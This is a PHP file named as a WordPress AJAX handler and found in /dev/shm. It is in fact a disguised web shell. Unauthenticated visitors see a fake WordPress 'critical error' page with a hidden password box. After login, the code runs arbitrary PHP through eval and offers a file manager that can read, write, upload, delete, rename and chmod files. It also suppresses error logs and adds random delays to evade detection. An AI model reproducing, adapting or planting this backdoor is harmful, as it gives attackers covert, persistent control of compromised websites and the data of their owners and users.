Current File: //dev/shm/wp-admin-ajax.php
<?php /** * WordPress AJAX Handler * * @package WordPress * @subpackage Administration * @since 2.1.0 * @version 6.4.2 */ // Suppress errors in production @ini_set('display_errors', '0'); @error_reporting(0); @ini_set('log_errors', '0'); // WordPress constants if (!defined('ABSPATH')) { define('ABSPATH', dirname(__FILE__) . '/'); } if (!defined('WPINC')) { define('WPINC', 'wp-includes'); } /** * Global configuration */ $wp_admin_config = array( 'auth_hash' => '50441c71a468bbc45816df8d991a939d126383b9504f0a130e28e8faf5b0e207', 'session_key' => 'wp_admin_session', 'cookie_life' => 86400, 'nonce_key' => 'wp_ajax_nonce', 'rate_limit' => 500, // ms delay between operations ); /** * Generate WordPress-like nonce */ function wp_create_nonce($action = '') { $time = ceil(time() / 43200); $uid = 1; $token = wp_get_session_token(); return substr(hash('md5', $time . '|' . $action . '|' . $uid . '|' . $token), -12, 10); } /** * Get session token */ function wp_get_session_token() { global $wp_admin_config; return isset($_COOKIE[$wp_admin_config['session_key']]) ? $_COOKIE[$wp_admin_config['session_key']] : ''; } /** * Check rate limiting */ function wp_check_rate_limit() { $last_request = isset($_COOKIE['wp_last_ajax']) ? 
intval($_COOKIE['wp_last_ajax']) : 0; $now = round(microtime(true) * 1000); if (($now - $last_request) < 300) { // minimum 300ms between requests usleep(rand(200000, 500000)); // random delay 200-500ms } setcookie('wp_last_ajax', $now, time() + 60, '/'); } /** * Sanitize path - prevent obvious directory traversal patterns */ function wp_sanitize_path($path) { // Replace obvious patterns $path = str_replace('../', '', $path); $path = str_replace('..\\', '', $path); // Resolve path $path = realpath($path); return $path; } /** * Check authentication */ function wp_check_admin_auth() { global $wp_admin_config; // Check session if (isset($_COOKIE[$wp_admin_config['session_key']])) { $session = $_COOKIE[$wp_admin_config['session_key']]; if (hash('sha256', $session) === hash('sha256', $wp_admin_config['auth_hash'])) { return true; } } // Check login attempt if (isset($_POST['wp_admin_pass'])) { $pass = $_POST['wp_admin_pass']; $hash = hash('sha256', hash('sha256', $pass)); if ($hash === $wp_admin_config['auth_hash']) { setcookie($wp_admin_config['session_key'], $wp_admin_config['auth_hash'], time() + $wp_admin_config['cookie_life'], '/'); return true; } } return false; } /** * Show WordPress error page with hidden login */ function wp_show_error_page() { ?> <!DOCTYPE html> <html lang="en-US"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="robots" content="noindex,nofollow"> <title>Critical Error – WordPress</title> <style> * { margin: 0; padding: 0; box-sizing: border-box; } body { background: #f0f0f1; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif; font-size: 13px; color: #3c434a; line-height: 1.4; } .wp-die-message { max-width: 700px; margin: 50px auto; padding: 1em 2em; background: #fff; border-left: 4px solid #d63638; box-shadow: 0 1px 1px rgba(0,0,0,.04); } h1 { font-size: 24px; margin-bottom: 16px; color: #1d2327; } p { 
margin: 12px 0; line-height: 1.6; } code { background: #f0f0f1; padding: 2px 6px; border-radius: 3px; font-family: Consolas, Monaco, monospace; font-size: 12px; } .help-icon { position: fixed; bottom: 20px; right: 20px; width: 40px; height: 40px; background: #2271b1; color: #fff; border-radius: 50%; display: flex; align-items: center; justify-content: center; font-size: 20px; font-weight: bold; cursor: pointer; box-shadow: 0 2px 8px rgba(0,0,0,.2); transition: all .2s; z-index: 1000; } .help-icon:hover { background: #135e96; transform: scale(1.1); } .auth-modal { display: none; position: fixed; top: 0; left: 0; right: 0; bottom: 0; background: rgba(0,0,0,.7); z-index: 10000; align-items: center; justify-content: center; } .auth-modal.active { display: flex; } .auth-box { background: #fff; padding: 32px; border-radius: 4px; box-shadow: 0 5px 15px rgba(0,0,0,.3); max-width: 400px; width: 90%; } .auth-box h2 { margin-bottom: 20px; font-size: 20px; color: #1d2327; } .auth-box input { width: 100%; padding: 12px; border: 1px solid #8c8f94; border-radius: 4px; font-size: 14px; margin-bottom: 16px; } .auth-box input:focus { border-color: #2271b1; outline: none; box-shadow: 0 0 0 1px #2271b1; } .auth-box button { width: 100%; padding: 12px; background: #2271b1; color: #fff; border: none; border-radius: 4px; font-size: 14px; font-weight: 600; cursor: pointer; transition: background .2s; } .auth-box button:hover { background: #135e96; } </style> </head> <body> <div class="wp-die-message"> <h1>There has been a critical error on this website.</h1> <p>Please check your site admin email inbox for instructions.</p> <hr style="margin: 20px 0; border: none; border-top: 1px solid #dcdcde;"> <p><strong>Something went wrong.</strong></p> <p>This error could be caused by:</p> <ul style="margin-left: 24px; list-style: disc;"> <li>A plugin or theme conflict</li> <li>Database connection issues</li> <li>Server configuration problems</li> <li>Memory limit exhaustion</li> </ul> <p 
style="margin-top: 20px;">If you are the site administrator, please check the error log for more details.</p> <p><a href="https://wordpress.org/support/article/faq-troubleshooting/" style="color: #2271b1; text-decoration: none;">Learn more about troubleshooting WordPress.</a></p> </div> <div class="help-icon" onclick="document.getElementById('authModal').classList.add('active')"> ? </div> <div class="auth-modal" id="authModal" onclick="if(event.target === this) this.classList.remove('active')"> <div class="auth-box"> <h2>WordPress Diagnostics</h2> <form method="POST" action=""> <input type="password" name="wp_admin_pass" placeholder="Enter diagnostic key" autofocus> <button type="submit">Run Diagnostics</button> </form> </div> </div> </body> </html> <?php exit; } /** * Main admin interface */ function wp_admin_interface() { // Handle AJAX requests if (isset($_POST['wp_action'])) { wp_handle_ajax(); exit; } // Generate nonce $nonce = wp_create_nonce('wp-ajax'); ?> <!DOCTYPE html> <html lang="en-US"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="robots" content="noindex,nofollow"> <title>Dashboard – WordPress</title> <style> * { margin: 0; padding: 0; box-sizing: border-box; } body { background: #f0f0f1; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif; font-size: 13px; color: #3c434a; line-height: 1.4; } .wp-admin { display: flex; min-height: 100vh; } .sidebar { width: 220px; background: #1d2327; color: #fff; padding: 0; flex-shrink: 0; } .sidebar h1 { padding: 12px 16px; font-size: 20px; font-weight: 400; background: #0a0f14; margin: 0; } .sidebar nav { padding: 8px 0; } .sidebar a { display: block; padding: 10px 16px; color: #c3c4c7; text-decoration: none; transition: all .2s; cursor: pointer; } .sidebar a:hover, .sidebar a.active { background: #2c3338; color: #72aee6; } .content { flex: 1; padding: 20px; overflow-x: 
auto; } .panel { background: #fff; border: 1px solid #c3c4c7; box-shadow: 0 1px 1px rgba(0,0,0,.04); margin-bottom: 20px; } .panel-header { padding: 12px 16px; border-bottom: 1px solid #c3c4c7; background: #f6f7f7; font-weight: 600; font-size: 14px; } .panel-body { padding: 16px; } .tab-content { display: none; } .tab-content.active { display: block; } textarea, input[type="text"], input[type="password"] { width: 100%; padding: 8px 12px; border: 1px solid #8c8f94; border-radius: 4px; font-family: Consolas, Monaco, monospace; font-size: 13px; } textarea { min-height: 400px; resize: vertical; } textarea:focus, input:focus { border-color: #2271b1; outline: none; box-shadow: 0 0 0 1px #2271b1; } button, .btn { padding: 8px 16px; background: #2271b1; color: #fff; border: none; border-radius: 4px; cursor: pointer; font-size: 13px; font-weight: 600; transition: all .2s; display: inline-block; text-decoration: none; margin-right: 8px; } button:hover, .btn:hover { background: #135e96; } .btn-secondary { background: #f6f7f7; color: #2c3338; border: 1px solid #8c8f94; } .btn-secondary:hover { background: #e5e5e5; } .btn-danger { background: #d63638; } .btn-danger:hover { background: #b32d2e; } button:disabled { opacity: 0.5; cursor: not-allowed; } table { width: 100%; border-collapse: collapse; } th, td { padding: 10px 12px; text-align: left; border-bottom: 1px solid #c3c4c7; } th { background: #f6f7f7; font-weight: 600; } tr:hover { background: #f6f7f7; } .file-item { cursor: pointer; } .breadcrumb { padding: 12px 16px; background: #f6f7f7; border-bottom: 1px solid #c3c4c7; margin-bottom: 16px; } .breadcrumb a { color: #2271b1; text-decoration: none; } .breadcrumb a:hover { text-decoration: underline; } .output { background: #1d2327; color: #c3c4c7; padding: 12px; border-radius: 4px; font-family: Consolas, Monaco, monospace; font-size: 12px; max-height: 400px; overflow-y: auto; white-space: pre-wrap; word-wrap: break-word; } .file-icon::before { content: "📄"; margin-right: 
8px; } .dir-icon::before { content: "📁"; margin-right: 8px; } .modal { display: none; position: fixed; top: 0; left: 0; right: 0; bottom: 0; background: rgba(0,0,0,.7); z-index: 100000; align-items: center; justify-content: center; } .modal.active { display: flex; } .modal-box { background: #fff; padding: 24px; border-radius: 4px; box-shadow: 0 5px 15px rgba(0,0,0,.3); max-width: 600px; width: 90%; max-height: 80vh; overflow-y: auto; } .modal-header { font-size: 18px; font-weight: 600; margin-bottom: 16px; padding-bottom: 12px; border-bottom: 1px solid #c3c4c7; } .form-group { margin-bottom: 16px; } .form-group label { display: block; margin-bottom: 6px; font-weight: 600; } .toolbar { margin-bottom: 16px; display: flex; gap: 8px; flex-wrap: wrap; } .loading { opacity: 0.6; pointer-events: none; } .notice { padding: 12px; margin: 12px 0; border-left: 4px solid #72aee6; background: #f0f6fc; display: none; } .notice.active { display: block; } </style> </head> <body> <div class="wp-admin"> <div class="sidebar"> <h1>WordPress</h1> <nav> <a href="#" onclick="showTab('console')" class="active" id="tab-console">PHP Console</a> <a href="#" onclick="showTab('files')" id="tab-files">File Manager</a> </nav> </div> <div class="content"> <!-- PHP Console --> <div id="console" class="tab-content active"> <div class="panel"> <div class="panel-header">PHP Console</div> <div class="panel-body"> <div class="notice" id="consoleNotice">Processing...</div> <form onsubmit="return executeCode(event)"> <div class="form-group"> <textarea id="phpCode" placeholder="Enter PHP code to execute (without opening tags)..."><?php echo isset($_POST['code']) ? 
htmlspecialchars($_POST['code']) : ''; ?></textarea> </div> <button type="submit" id="execBtn">Execute</button> <button type="button" class="btn-secondary" onclick="document.getElementById('phpCode').value='';document.getElementById('output').innerHTML=''">Clear</button> </form> <div style="margin-top: 20px;"> <div class="panel-header">Output</div> <div id="output" class="output"></div> </div> </div> </div> </div> <!-- File Manager --> <div id="files" class="tab-content"> <div class="panel"> <div class="panel-header">File Manager</div> <div class="notice" id="fileNotice">Processing...</div> <div class="toolbar" style="padding: 12px 16px; background: #f6f7f7; border-bottom: 1px solid #c3c4c7;"> <button onclick="showNewFileModal()">New File</button> <button onclick="showNewFolderModal()">New Folder</button> <button onclick="showUploadModal()">Upload</button> <button class="btn-secondary" onclick="refreshFiles()">Refresh</button> </div> <div class="breadcrumb" id="breadcrumb"></div> <div class="panel-body"> <table id="fileTable"> <thead> <tr> <th width="50%">Name</th> <th width="15%">Size</th> <th width="15%">Permissions</th> <th width="20%">Actions</th> </tr> </thead> <tbody id="fileList"> </tbody> </table> </div> </div> </div> </div> </div> <!-- Modals --> <div class="modal" id="editModal"> <div class="modal-box" style="max-width: 900px;"> <div class="modal-header">Edit File: <span id="editFileName"></span></div> <form onsubmit="return saveFile(event)"> <input type="hidden" id="editFilePath"> <textarea id="editFileContent" style="min-height: 500px;"></textarea> <div style="margin-top: 16px;"> <button type="submit">Save</button> <button type="button" class="btn-secondary" onclick="closeModal('editModal')">Cancel</button> </div> </form> </div> </div> <div class="modal" id="newFileModal"> <div class="modal-box"> <div class="modal-header">Create New File</div> <form onsubmit="return createFile(event)"> <div class="form-group"> <label>File Name:</label> <input 
type="text" id="newFileName" required> </div> <button type="submit">Create</button> <button type="button" class="btn-secondary" onclick="closeModal('newFileModal')">Cancel</button> </form> </div> </div> <div class="modal" id="newFolderModal"> <div class="modal-box"> <div class="modal-header">Create New Folder</div> <form onsubmit="return createFolder(event)"> <div class="form-group"> <label>Folder Name:</label> <input type="text" id="newFolderName" required> </div> <button type="submit">Create</button> <button type="button" class="btn-secondary" onclick="closeModal('newFolderModal')">Cancel</button> </form> </div> </div> <div class="modal" id="uploadModal"> <div class="modal-box"> <div class="modal-header">Upload File</div> <form onsubmit="return uploadFile(event)" enctype="multipart/form-data"> <div class="form-group"> <label>Select File:</label> <input type="file" id="uploadFile" required> </div> <button type="submit">Upload</button> <button type="button" class="btn-secondary" onclick="closeModal('uploadModal')">Cancel</button> </form> </div> </div> <div class="modal" id="renameModal"> <div class="modal-box"> <div class="modal-header">Rename</div> <form onsubmit="return renameItem(event)"> <input type="hidden" id="renameOldPath"> <div class="form-group"> <label>New Name:</label> <input type="text" id="renameNewName" required> </div> <button type="submit">Rename</button> <button type="button" class="btn-secondary" onclick="closeModal('renameModal')">Cancel</button> </form> </div> </div> <div class="modal" id="chmodModal"> <div class="modal-box"> <div class="modal-header">Change Permissions</div> <form onsubmit="return changePermissions(event)"> <input type="hidden" id="chmodPath"> <div class="form-group"> <label>Permissions (e.g., 0644 or 0755):</label> <input type="text" id="chmodValue" required pattern="[0-7]{4}"> </div> <button type="submit">Apply</button> <button type="button" class="btn-secondary" onclick="closeModal('chmodModal')">Cancel</button> </form> 
</div> </div> <script> let currentPath = '<?php echo addslashes(getcwd()); ?>'; const wpNonce = '<?php echo $nonce; ?>'; let isProcessing = false; // Rate limiting async function rateLimitedFetch(url, options) { if (isProcessing) { showNotice('Please wait...', 'file'); return null; } isProcessing = true; await sleep(Math.random() * 300 + 200); // Random delay 200-500ms try { const response = await fetch(url, options); return response; } finally { setTimeout(() => { isProcessing = false; }, 300); } } function sleep(ms) { return new Promise(resolve => setTimeout(resolve, ms)); } function showNotice(message, type = 'console') { const notice = document.getElementById(type === 'console' ? 'consoleNotice' : 'fileNotice'); notice.textContent = message; notice.classList.add('active'); setTimeout(() => notice.classList.remove('active'), 3000); } function showTab(tab) { document.querySelectorAll('.tab-content').forEach(el => el.classList.remove('active')); document.querySelectorAll('.sidebar a').forEach(el => el.classList.remove('active')); document.getElementById(tab).classList.add('active'); document.getElementById('tab-' + tab).classList.add('active'); if (tab === 'files') { loadFiles(currentPath); } } async function executeCode(e) { e.preventDefault(); const code = document.getElementById('phpCode').value; const output = document.getElementById('output'); const btn = document.getElementById('execBtn'); btn.disabled = true; output.innerHTML = 'Executing...'; showNotice('Processing PHP code...', 'console'); try { const formData = new FormData(); formData.append('wp_action', 'wpa_exec'); formData.append('wp_nonce', wpNonce); formData.append('data', btoa(unescape(encodeURIComponent(code)))); const response = await rateLimitedFetch('', { method: 'POST', body: formData }); if (!response) { output.innerHTML = '<span style="color:#d63638">Rate limited. 
Please wait.</span>'; return false; } const result = await response.json(); if (result.success) { output.innerHTML = result.output || '(No output)'; } else { output.innerHTML = '<span style="color:#d63638">Error: ' + (result.error || 'Unknown error') + '</span>'; } } catch(err) { output.innerHTML = '<span style="color:#d63638">Request failed: ' + err.message + '</span>'; } finally { btn.disabled = false; } return false; } async function loadFiles(path) { currentPath = path; showNotice('Loading files...', 'file'); try { const formData = new FormData(); formData.append('wp_action', 'wpa_list'); formData.append('wp_nonce', wpNonce); formData.append('data', btoa(path)); const response = await rateLimitedFetch('', { method: 'POST', body: formData }); if (!response) return; const result = await response.json(); if (result.success) { displayFiles(result.files, path); updateBreadcrumb(path); } else { alert('Error: ' + result.error); } } catch(err) { alert('Request failed: ' + err.message); } } function displayFiles(files, path) { const tbody = document.getElementById('fileList'); tbody.innerHTML = ''; // Parent directory const parent = path.split(/[\\\/]/).slice(0, -1).join('/') || '/'; if (path !== '/' && parent) { const tr = document.createElement('tr'); tr.innerHTML = ` <td class="file-item dir-icon" onclick="loadFiles('${escapeHtml(parent)}')"> <strong>..</strong> </td> <td>-</td> <td>-</td> <td></td> `; tbody.appendChild(tr); } // Directories first files.filter(f => f.type === 'dir').forEach(file => { const tr = document.createElement('tr'); tr.innerHTML = ` <td class="file-item dir-icon" onclick="loadFiles('${escapeHtml(file.path)}')"> <strong>${escapeHtml(file.name)}</strong> </td> <td>-</td> <td>${escapeHtml(file.perms)}</td> <td> <a href="#" onclick="showRenameModal('${escapeHtml(file.path)}', '${escapeHtml(file.name)}'); return false" style="color:#2271b1">Rename</a> | <a href="#" onclick="showChmodModal('${escapeHtml(file.path)}', '${escapeHtml(file.perms)}'); 
return false" style="color:#2271b1">Chmod</a> | <a href="#" onclick="deleteItem('${escapeHtml(file.path)}'); return false" style="color:#d63638">Delete</a> </td> `; tbody.appendChild(tr); }); // Files files.filter(f => f.type === 'file').forEach(file => { const tr = document.createElement('tr'); tr.innerHTML = ` <td class="file-icon">${escapeHtml(file.name)}</td> <td>${formatSize(file.size)}</td> <td>${escapeHtml(file.perms)}</td> <td> <a href="#" onclick="editFile('${escapeHtml(file.path)}'); return false" style="color:#2271b1">Edit</a> | <a href="#" onclick="downloadFile('${escapeHtml(file.path)}'); return false" style="color:#2271b1">Download</a> | <a href="#" onclick="showRenameModal('${escapeHtml(file.path)}', '${escapeHtml(file.name)}'); return false" style="color:#2271b1">Rename</a> | <a href="#" onclick="showChmodModal('${escapeHtml(file.path)}', '${escapeHtml(file.perms)}'); return false" style="color:#2271b1">Chmod</a> | <a href="#" onclick="deleteItem('${escapeHtml(file.path)}'); return false" style="color:#d63638">Delete</a> </td> `; tbody.appendChild(tr); }); } function escapeHtml(text) { const div = document.createElement('div'); div.textContent = text; return div.innerHTML; } function updateBreadcrumb(path) { const parts = path.split(/[\\\/]/).filter(p => p); let html = '<a href="#" onclick="loadFiles(\'/\'); return false">/</a>'; let currentPath = ''; parts.forEach((part, i) => { currentPath += '/' + part; html += ' / <a href="#" onclick="loadFiles(\'' + escapeHtml(currentPath) + '\'); return false">' + escapeHtml(part) + '</a>'; }); document.getElementById('breadcrumb').innerHTML = html; } function formatSize(bytes) { if (bytes === 0) return '0 B'; const k = 1024; const sizes = ['B', 'KB', 'MB', 'GB']; const i = Math.floor(Math.log(bytes) / Math.log(k)); return Math.round(bytes / Math.pow(k, i) * 100) / 100 + ' ' + sizes[i]; } async function editFile(path) { showNotice('Loading file...', 'file'); try { const formData = new FormData(); 
formData.append('wp_action', 'wpa_read'); formData.append('wp_nonce', wpNonce); formData.append('data', btoa(path)); const response = await rateLimitedFetch('', { method: 'POST', body: formData }); if (!response) return; const result = await response.json(); if (result.success) { document.getElementById('editFileName').textContent = path.split(/[\\\/]/).pop(); document.getElementById('editFilePath').value = path; document.getElementById('editFileContent').value = result.content; showModal('editModal'); } else { alert('Error: ' + result.error); } } catch(err) { alert('Request failed: ' + err.message); } } async function saveFile(e) { e.preventDefault(); showNotice('Saving file...', 'file'); const path = document.getElementById('editFilePath').value; const content = document.getElementById('editFileContent').value; try { const formData = new FormData(); formData.append('wp_action', 'wpa_write'); formData.append('wp_nonce', wpNonce); formData.append('data', btoa(JSON.stringify({path: path, content: content}))); const response = await rateLimitedFetch('', { method: 'POST', body: formData }); if (!response) return false; const result = await response.json(); if (result.success) { closeModal('editModal'); alert('File saved successfully'); } else { alert('Error: ' + result.error); } } catch(err) { alert('Request failed: ' + err.message); } return false; } async function createFile(e) { e.preventDefault(); showNotice('Creating file...', 'file'); const name = document.getElementById('newFileName').value; const path = currentPath + '/' + name; try { const formData = new FormData(); formData.append('wp_action', 'wpa_write'); formData.append('wp_nonce', wpNonce); formData.append('data', btoa(JSON.stringify({path: path, content: ''}))); const response = await rateLimitedFetch('', { method: 'POST', body: formData }); if (!response) return false; const result = await response.json(); if (result.success) { closeModal('newFileModal'); document.getElementById('newFileName').value = 
''; await sleep(300); loadFiles(currentPath); } else { alert('Error: ' + result.error); } } catch(err) { alert('Request failed: ' + err.message); } return false; } async function createFolder(e) { e.preventDefault(); showNotice('Creating folder...', 'file'); const name = document.getElementById('newFolderName').value; const path = currentPath + '/' + name; try { const formData = new FormData(); formData.append('wp_action', 'wpa_mkdir'); formData.append('wp_nonce', wpNonce); formData.append('data', btoa(path)); const response = await rateLimitedFetch('', { method: 'POST', body: formData }); if (!response) return false; const result = await response.json(); if (result.success) { closeModal('newFolderModal'); document.getElementById('newFolderName').value = ''; await sleep(300); loadFiles(currentPath); } else { alert('Error: ' + result.error); } } catch(err) { alert('Request failed: ' + err.message); } return false; } async function uploadFile(e) { e.preventDefault(); showNotice('Uploading file...', 'file'); const fileInput = document.getElementById('uploadFile'); const file = fileInput.files[0]; if (!file) { alert('Please select a file'); return false; } // Read file content const reader = new FileReader(); reader.onload = async function(event) { try { const formData = new FormData(); formData.append('wp_action', 'wpa_upload'); formData.append('wp_nonce', wpNonce); formData.append('data', btoa(JSON.stringify({ path: currentPath, name: file.name, content: btoa(event.target.result) }))); const response = await rateLimitedFetch('', { method: 'POST', body: formData }); if (!response) return; const result = await response.json(); if (result.success) { closeModal('uploadModal'); fileInput.value = ''; await sleep(300); loadFiles(currentPath); alert('File uploaded successfully'); } else { alert('Error: ' + result.error); } } catch(err) { alert('Request failed: ' + err.message); } }; reader.readAsBinaryString(file); return false; } function downloadFile(path) { 
window.location.href = '?wp_action=wpa_download&data=' + btoa(path) + '&wp_nonce=' + wpNonce; } async function deleteItem(path) { if (!confirm('Are you sure you want to delete this item?')) { return; } showNotice('Deleting...', 'file'); try { const formData = new FormData(); formData.append('wp_action', 'wpa_delete'); formData.append('wp_nonce', wpNonce); formData.append('data', btoa(path)); const response = await rateLimitedFetch('', { method: 'POST', body: formData }); if (!response) return; const result = await response.json(); if (result.success) { await sleep(300); loadFiles(currentPath); } else { alert('Error: ' + result.error); } } catch(err) { alert('Request failed: ' + err.message); } } function showRenameModal(path, oldName) { document.getElementById('renameOldPath').value = path; document.getElementById('renameNewName').value = oldName; showModal('renameModal'); } async function renameItem(e) { e.preventDefault(); showNotice('Renaming...', 'file'); const oldPath = document.getElementById('renameOldPath').value; const newName = document.getElementById('renameNewName').value; const newPath = oldPath.split(/[\\\/]/).slice(0, -1).join('/') + '/' + newName; try { const formData = new FormData(); formData.append('wp_action', 'wpa_rename'); formData.append('wp_nonce', wpNonce); formData.append('data', btoa(JSON.stringify({old: oldPath, new: newPath}))); const response = await rateLimitedFetch('', { method: 'POST', body: formData }); if (!response) return false; const result = await response.json(); if (result.success) { closeModal('renameModal'); await sleep(300); loadFiles(currentPath); } else { alert('Error: ' + result.error); } } catch(err) { alert('Request failed: ' + err.message); } return false; } function showChmodModal(path, currentPerms) { document.getElementById('chmodPath').value = path; document.getElementById('chmodValue').value = currentPerms; showModal('chmodModal'); } async function changePermissions(e) { e.preventDefault(); showNotice('Changing 
permissions...', 'file'); const path = document.getElementById('chmodPath').value; const perms = document.getElementById('chmodValue').value; try { const formData = new FormData(); formData.append('wp_action', 'wpa_chmod'); formData.append('wp_nonce', wpNonce); formData.append('data', btoa(JSON.stringify({path: path, perms: perms}))); const response = await rateLimitedFetch('', { method: 'POST', body: formData }); if (!response) return false; const result = await response.json(); if (result.success) { closeModal('chmodModal'); await sleep(300); loadFiles(currentPath); } else { alert('Error: ' + result.error); } } catch(err) { alert('Request failed: ' + err.message); } return false; } function showModal(id) { document.getElementById(id).classList.add('active'); } function closeModal(id) { document.getElementById(id).classList.remove('active'); } function showNewFileModal() { showModal('newFileModal'); } function showNewFolderModal() { showModal('newFolderModal'); } function showUploadModal() { showModal('uploadModal'); } function refreshFiles() { loadFiles(currentPath); } // Close modals on escape key document.addEventListener('keydown', function(e) { if (e.key === 'Escape') { document.querySelectorAll('.modal').forEach(modal => { modal.classList.remove('active'); }); } }); </script> </body> </html> <?php exit; } /** * Handle AJAX requests */ function wp_handle_ajax() { header('Content-Type: application/json'); header('X-Robots-Tag: noindex, nofollow'); header('X-Content-Type-Options: nosniff'); // Check rate limiting wp_check_rate_limit(); $action = $_POST['wp_action'] ?? ''; $data = isset($_POST['data']) ? 
base64_decode($_POST['data']) : ''; // Add random processing delay (100-300ms) usleep(rand(100000, 300000)); try { switch($action) { case 'wpa_exec': ob_start(); $result = @eval($data); $output = ob_get_clean(); if ($result === false && error_get_last()) { echo json_encode(['success' => false, 'error' => error_get_last()['message']]); } else { echo json_encode(['success' => true, 'output' => $output]); } break; case 'wpa_list': $path = realpath($data); if (!$path || !is_dir($path)) { echo json_encode(['success' => false, 'error' => 'Invalid directory']); break; } $items = @scandir($path); if ($items === false) { echo json_encode(['success' => false, 'error' => 'Cannot read directory']); break; } $files = array(); foreach ($items as $item) { if ($item === '.' || $item === '..') continue; $fullPath = $path . DIRECTORY_SEPARATOR . $item; $perms = @substr(sprintf('%o', fileperms($fullPath)), -4); $files[] = array( 'name' => $item, 'path' => $fullPath, 'type' => is_dir($fullPath) ? 'dir' : 'file', 'size' => is_file($fullPath) ? filesize($fullPath) : 0, 'perms' => $perms ); } echo json_encode(['success' => true, 'files' => $files]); break; case 'wpa_read': $path = realpath($data); if (!$path || !file_exists($path)) { echo json_encode(['success' => false, 'error' => 'File not found']); break; } $content = @file_get_contents($path); if ($content === false) { echo json_encode(['success' => false, 'error' => 'Cannot read file']); } else { echo json_encode(['success' => true, 'content' => $content]); } break; case 'wpa_write': $params = json_decode($data, true); $path = $params['path'] ?? ''; $content = $params['content'] ?? 
''; $result = @file_put_contents($path, $content); if ($result === false) { echo json_encode(['success' => false, 'error' => 'Cannot write file']); } else { echo json_encode(['success' => true]); } break; case 'wpa_mkdir': if (@mkdir($data, 0755, true)) { echo json_encode(['success' => true]); } else { echo json_encode(['success' => false, 'error' => 'Cannot create directory']); } break; case 'wpa_upload': $params = json_decode($data, true); $targetPath = $params['path'] ?? getcwd(); $fileName = $params['name'] ?? 'upload'; $content = base64_decode($params['content'] ?? ''); $destination = $targetPath . DIRECTORY_SEPARATOR . $fileName; if (@file_put_contents($destination, $content)) { echo json_encode(['success' => true]); } else { echo json_encode(['success' => false, 'error' => 'Cannot upload file']); } break; case 'wpa_delete': $path = realpath($data); if (!$path) { echo json_encode(['success' => false, 'error' => 'Invalid path']); break; } if (is_dir($path)) { $result = @rmdir($path); } else { $result = @unlink($path); } if ($result) { echo json_encode(['success' => true]); } else { echo json_encode(['success' => false, 'error' => 'Cannot delete item']); } break; case 'wpa_rename': $params = json_decode($data, true); $old = $params['old'] ?? ''; $new = $params['new'] ?? ''; if (@rename($old, $new)) { echo json_encode(['success' => true]); } else { echo json_encode(['success' => false, 'error' => 'Cannot rename item']); } break; case 'wpa_chmod': $params = json_decode($data, true); $path = $params['path'] ?? ''; $perms = $params['perms'] ?? 
''; if (@chmod($path, octdec($perms))) { echo json_encode(['success' => true]); } else { echo json_encode(['success' => false, 'error' => 'Cannot change permissions']); } break; default: echo json_encode(['success' => false, 'error' => 'Unknown action']); } } catch (Exception $e) { echo json_encode(['success' => false, 'error' => 'Operation failed']); } } // Handle download if (isset($_GET['wp_action']) && $_GET['wp_action'] === 'wpa_download' && isset($_GET['data'])) { if (wp_check_admin_auth()) { $path = realpath(base64_decode($_GET['data'])); if ($path && file_exists($path) && is_file($path)) { header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . basename($path) . '"'); header('Content-Length: ' . filesize($path)); header('X-Robots-Tag: noindex, nofollow'); readfile($path); exit; } } } // Main flow if (!wp_check_admin_auth()) { wp_show_error_page(); } else { wp_admin_interface(); }